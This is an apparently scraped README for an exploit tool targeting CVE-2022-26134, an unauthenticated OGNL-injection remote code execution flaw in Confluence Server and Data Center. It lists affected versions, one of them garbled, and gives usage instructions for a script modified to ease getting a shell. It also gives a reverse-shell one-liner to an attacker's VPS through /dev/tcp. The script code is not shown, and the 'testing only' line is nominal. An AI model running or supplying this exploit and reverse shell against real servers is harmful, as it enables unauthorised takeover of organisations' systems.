Share
## https://sploitus.com/exploit?id=F0CF90CD-DC6E-5F0F-AD61-5E1694700F32
# CVE-2022-26134
远程攻击者在未经身份验证的情况下,可构造OGNL表达式进行注入,实现在Confluence Server或Data Center上执行任意代码,修改poc,方便getshell。常见端口:8090
## 影响版本
* Confluence Server and Data Center >= 1.3.0
* 7.14.0 <= Confluence Server and Data Center < 7.4.17
* 7.13.0 <= Confluence Server and Data Center < 7.13.7
* 7.14.0 <= Confluence Server and Data Center < 7.14.3
* 7.15.0 <= Confluence Server and Data Center < 7.15.2
* 7.16.0 <= Confluence Server and Data Center < 7.16.4
* 7.17.0 <= Confluence Server and Data Center < 7.17.4
* 7.18.0 <= Confluence Server and Data Center < 7.18.1
## 使用说明
```
pip3 install requests
```
```shell
______ _______ ____ ___ ____ ____ ____ __ _ _____ _ _
/ ___\ \ / | ____| |___ \ / _ |___ \|___ \ |___ \ / /_ / |___ /| || |
| | \ \ / /| _| _____ __) | | | |__) | __) _____ __) | '_ \| | |_ \| || |_
| |___ \ V / | |__|_____/ __/| |_| / __/ / __|_____/ __/| (_) | |___) |__ _|
\____| \_/ |_____| |_____|\___|_____|_____| |_____|\___/|_|____/ |_|
usage: CVE-2022-26134.py [-h] -t TARGET -c COMMAND
CVE-2022-26134
optional arguments:
-h, --help show this help message and exit
-t TARGET, --target TARGET
目标URL
-c COMMAND, --command COMMAND
执行命令(execute command),get shell:/bin/bash -c bash -i >& /dev/tcp/{vps ip}/{vps port} 0>&1
```
## 使用
```shell
python3 CVE-2022-26134.py -t [server ip] -c [command] //执行命令
```
此脚本仅可用于测试使用,勿作他用